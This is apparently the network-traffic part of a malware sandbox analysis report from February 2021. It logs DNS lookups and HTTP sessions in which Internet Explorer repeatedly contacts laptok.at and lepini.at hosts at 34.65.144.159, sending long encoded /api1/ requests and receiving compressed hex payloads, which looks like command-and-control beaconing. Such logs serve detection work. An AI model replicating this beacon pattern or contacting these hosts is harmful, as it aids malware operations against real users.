Feb 16, 2021 00:58:19.901582003 CET	63492	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:19.958559036 CET	53	63492	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:36.070688009 CET	58945	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:36.128077030 CET	53	58945	8.8.8.8	192.168.2.4
Feb 16, 2021 00:58:55.906318903 CET	60779	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:58:56.196962118 CET	53	60779	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:03.718739986 CET	64014	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:03.767468929 CET	53	64014	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:05.158071995 CET	57091	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:05.209448099 CET	53	57091	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:05.444958925 CET	55904	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:05.504158974 CET	53	55904	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:06.626705885 CET	52109	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:06.687158108 CET	53	52109	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:08.215668917 CET	54450	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:08.273060083 CET	53	54450	8.8.8.8	192.168.2.4
Feb 16, 2021 00:59:09.736731052 CET	49374	53	192.168.2.4	8.8.8.8
Feb 16, 2021 00:59:09.793631077 CET	53	49374	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Feb 16, 2021 00:58:10.168631077 CET	192.168.2.4	8.8.8.8	d003	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 16, 2021 00:57:31.814762115 CET	192.168.2.4	8.8.8.8	0x5b17	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:34.188555002 CET	192.168.2.4	8.8.8.8	0x4996	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:34.628803015 CET	192.168.2.4	8.8.8.8	0x891	Standard query (0)	geolocation.onetrust.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:34.713625908 CET	192.168.2.4	8.8.8.8	0x1c4e	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:36.568550110 CET	192.168.2.4	8.8.8.8	0x5c3e	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:37.263225079 CET	192.168.2.4	8.8.8.8	0xec16	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:37.863677979 CET	192.168.2.4	8.8.8.8	0x5730	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:38.229052067 CET	192.168.2.4	8.8.8.8	0xc9a	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:39.318974018 CET	192.168.2.4	8.8.8.8	0xd5ee	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:08.847168922 CET	192.168.2.4	8.8.8.8	0xaf9a	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:09.856961966 CET	192.168.2.4	8.8.8.8	0xaf9a	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:13.779700994 CET	192.168.2.4	8.8.8.8	0xa6f4	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:17.105812073 CET	192.168.2.4	8.8.8.8	0x42fc	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:55.906318903 CET	192.168.2.4	8.8.8.8	0x965c	Standard query (0)	c56.lepini.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:03.718739986 CET	192.168.2.4	8.8.8.8	0x7e54	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:05.444958925 CET	192.168.2.4	8.8.8.8	0x73de	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:06.626705885 CET	192.168.2.4	8.8.8.8	0xf553	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:08.215668917 CET	192.168.2.4	8.8.8.8	0x517	Standard query (0)	api3.lepini.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 16, 2021 00:57:31.865664005 CET	8.8.8.8	192.168.2.4	0x5b17	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:34.256162882 CET	8.8.8.8	192.168.2.4	0x4996	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:34.677495003 CET	8.8.8.8	192.168.2.4	0x891	No error (0)	geolocation.onetrust.com		104.20.184.68	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:34.677495003 CET	8.8.8.8	192.168.2.4	0x891	No error (0)	geolocation.onetrust.com		104.20.185.68	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:34.785234928 CET	8.8.8.8	192.168.2.4	0x1c4e	No error (0)	contextual.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:36.635288954 CET	8.8.8.8	192.168.2.4	0x5c3e	No error (0)	lg3.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:37.338659048 CET	8.8.8.8	192.168.2.4	0xec16	No error (0)	hblg.media.net		184.30.24.22	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:37.924860954 CET	8.8.8.8	192.168.2.4	0x5730	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:38.288559914 CET	8.8.8.8	192.168.2.4	0xc9a	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:38.288559914 CET	8.8.8.8	192.168.2.4	0xc9a	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET	8.8.8.8	192.168.2.4	0xd5ee	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET	8.8.8.8	192.168.2.4	0xd5ee	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET	8.8.8.8	192.168.2.4	0xd5ee	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET	8.8.8.8	192.168.2.4	0xd5ee	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Feb 16, 2021 00:57:39.378199100 CET	8.8.8.8	192.168.2.4	0xd5ee	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:10.156774998 CET	8.8.8.8	192.168.2.4	0xaf9a	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:10.168512106 CET	8.8.8.8	192.168.2.4	0xaf9a	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:13.839030027 CET	8.8.8.8	192.168.2.4	0xa6f4	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:17.165864944 CET	8.8.8.8	192.168.2.4	0x42fc	No error (0)	api10.laptok.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:58:56.196962118 CET	8.8.8.8	192.168.2.4	0x965c	No error (0)	c56.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:03.767468929 CET	8.8.8.8	192.168.2.4	0x7e54	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:05.504158974 CET	8.8.8.8	192.168.2.4	0x73de	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:06.687158108 CET	8.8.8.8	192.168.2.4	0xf553	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)
Feb 16, 2021 00:59:08.273060083 CET	8.8.8.8	192.168.2.4	0x517	No error (0)	api3.lepini.at		34.65.144.159	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api10.laptok.at

c56.lepini.at

api3.lepini.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49775	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:10.224896908 CET	3153	OUT	GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 16, 2021 00:58:10.695950031 CET	3155	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 47 72 83 50 10 44 0f c4 82 9c 96 e4 9c 33 3b 32 08 10 88 0c a7 37 5e b9 5c b6 15 fe 9f e9 7e af ca 32 5a 92 58 bd c3 b3 ad 5f 41 52 c6 09 17 b1 36 d6 87 7b 19 67 96 45 82 56 ad 6a 44 6e 28 33 5e a6 77 10 c3 2d ea 6b 90 60 5f 0a 1d 88 64 ca 72 64 3f ad 1a e1 7b 51 60 10 c8 64 6b 84 05 ed c1 8c 20 51 6a 52 11 7e b2 9e 3d 18 a6 b3 a6 56 61 a7 e5 a8 e5 63 87 16 01 32 fc 47 4b 15 a2 0a f9 51 ce 05 27 cc 42 9b c3 d4 f5 b3 4b 35 64 92 02 40 7f 65 e3 d6 9c 1b a8 a6 51 3f 7e d4 d5 90 1f 4b d7 f7 6d a0 cf ae 19 22 f7 51 c4 75 fc 9d da 7c 03 ea 45 73 63 4c cc 0b ff 0d 81 24 b7 39 9b 7b 78 69 ae 14 2b ec 74 f6 5b aa 78 e6 8f de 13 6d 35 9d 4d 8f c1 d1 df a5 f9 f2 c1 85 a9 19 8c 64 a9 7c d2 c4 e2 7c 44 2e bd be db 84 54 b5 c4 87 93 94 35 3a ec e4 58 b5 52 5b 7a b3 2c 4d 19 bf cc ea 4d b4 f1 71 9a a2 5a 07 f0 ef c1 bd 2d 5c c3 86 50 40 8e 80 48 19 87 8f 1c 8f 74 7c 26 2a c2 29 1f 40 18 14 a7 0b 44 d0 39 7d 74 41 b1 f4 50 05 a3 ba fa 71 9b c4 0b 02 96 37 94 21 2e c2 2f 6a 98 ef 93 57 3f 95 c9 8f 3d cf 92 9b 07 20 20 2d 06 d0 69 ab b8 df 8d 28 ff b1 e1 b3 7e c9 44 4d 07 18 3e 80 d8 3e 77 7f 0d 64 3c aa d4 c3 ef 01 91 29 b3 33 32 b7 c5 18 ea ad 04 71 81 8a 9b 87 e7 40 69 0a 60 d7 ce 66 f5 b0 d8 2f 16 38 df 63 9f 4b e3 a6 b2 e0 7d 04 f3 f0 87 f4 fe 16 07 57 29 fd 42 60 08 74 0e 5e 7b b1 a1 56 8f 1c 38 63 9c 16 48 06 08 25 07 46 8c ee 8d 1e f5 11 4d 06 c0 6f 85 ef a7 96 5f 12 bb 82 22 31 88 a4 51 fa 44 b0 cd c1 d7 47 df d5 0f 40 cd 9e f4 34 1c fd 93 9e e9 c6 c7 f8 07 ab 0b 89 c2 fa 64 84 e0 5a 10 e1 31 02 e9 91 98 98 5b 92 12 d2 fc 1a 41 03 79 03 bb de bf 73 2f 22 1a 1a f1 48 f5 5e a8 67 d8 74 1f 84 ba bd 23 7b a2 e8 da 3e ad a8 8e 61 04 20 e3 6c 7e 0c 47 c4 f3 0a ff 78 fd b8 20 3a a1 48 e6 0e 90 14 a4 61 81 5a 75 de c6 d7 36 c7 00 57 92 08 f1 49 03 b5 72 a2 f8 44 c4 e3 3a 7a e6 ee a2 e3 33 50 ba a6 81 27 63 dd 13 f8 53 66 27 8f 61 1e 16 0c a5 8c 70 18 8f 60 26 a1 a2 d3 14 36 93 70 3b 64 da 52 44 8f a4 18 ca be 81 39 04 57 65 d1 b6 4d d8 f7 cc 68 61 a2 52 5c 2f 20 ea e7 d7 cf 3e f4 ab aa 43 69 c7 66 cb be cf 2f 70 2e 31 23 88 ad 10 7a e6 5a dd ef 69 e5 dd 88 4e f9 1c 4a 45 8b 7a 3f d4 9d 85 4e 3f f2 94 b1 a8 80 5d 36 a5 f8 dd dd ae 36 23 ef ff 00 1d 14 d2 b9 5c 7c a5 9b 02 66 1f 7f 74 3a 40 ed 77 ab 38 25 10 01 14 5f e2 8f bf d6 df 7e 20 b3 4b ad ee 62 66 c3 09 05 6e d1 95 75 6b 86 d5 b3 00 ca d1 4f b6 81 87 c1 ba c4 28 07 4c a1 62 2c 71 18 6e 49 d8 6d ce 0f ea d3 97 a2 7b bf ba 89 61 0f f7 e0 42 b7 5d 19 71 7b 20 82 4b 68 20 ce c7 fe 1a 3b a5 78 37 d7 da d6 71 35 d7 c7 31 b5 46 34 38 97 1f fb 09 8a d9 c6 86 66 04 ac 14 f9 f7 19 66 04 77 e8 af 23 49 48 2c 94 82 a7 93 f7 52 2d 12 22 ac fa 3d c1 66 0f 08 c1 ae 15 34 12 b5 a7 7b 9b 1d 03 b5 b7 e3 40 a3 91 1d 94 f6 a3 e5 e9 11 c4 91 75 bc 9f 2d 6b 8f fd 0c 2a b7 19 63 b8 f0 17 b3 9c 8e 60 b2 2e f8 3b 03 bd e5 07 c9 71 9b 50 46 81 d9 35 59 4e c7 44 07 25 7b e4 f9 c2 82 f0 fb 00 65 fa bb dc c5 05 05 74 bf 43 39 f1 a5 1e 8b 05 42 06 c9 7c 60 50 e4 2b a3 a4 2e 37 62 d3 dc 4d 7a 1e 8f 22 01 7d 19 87 3d 46 3c 4e 66 85 47 fe 95 7e 01 8a 2b 7c ca 9c 95 7f 8d c4 e4 fb 35 f7 30 f0 Data Ascii: 2000GrPD3;27^\~2ZX_AR6{gEVjDn(3^w-k`_drd?{Q`dk QjR~=Vac2GKQ'BK5d@eQ?~Km"Qu\|EscL$9{xi+t[xm5Md\|\|D.T5:XR[z,MMqZ-\P@Ht\|&)@D9}tAPq7!./jW?= -i(~DM>>wd<)32q@i`f/8cK}W)B`t^{V8cH%FMo_"1QDG@4dZ1[Ays/"H^gt#{>a l~Gx :HaZu6WIrD:z3P'cSf'ap`&6p;dRD9WeMhaR\/ >Cif/p.1#zZiNJEz?N?]66#\\|ft:@w8%_~ KbfnukO(Lb,qnIm{aB]q{ Kh ;x7q51F48ffw#IH,R-"=f4{@u-kc`.;qPF5YND%{etC9B\|`P+.7bMz"}=F<NfG~+\|50

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49776	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:11.253958941 CET	3368	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 16, 2021 00:58:11.377232075 CET	3368	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 15 Feb 2021 23:58:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49780	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:13.894741058 CET	3484	OUT	GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 16, 2021 00:58:14.372047901 CET	3549	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi\|+77+U]IR1/\|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&\|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!mk3^P37%.Ko%]G!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49781	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:14.900562048 CET	3842	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 16, 2021 00:58:15.025079012 CET	3843	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 15 Feb 2021 23:58:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49788	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 16, 2021 00:58:17.225936890 CET	4069	OUT	GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 16, 2021 00:58:17.669728994 CET	4247	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 23:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 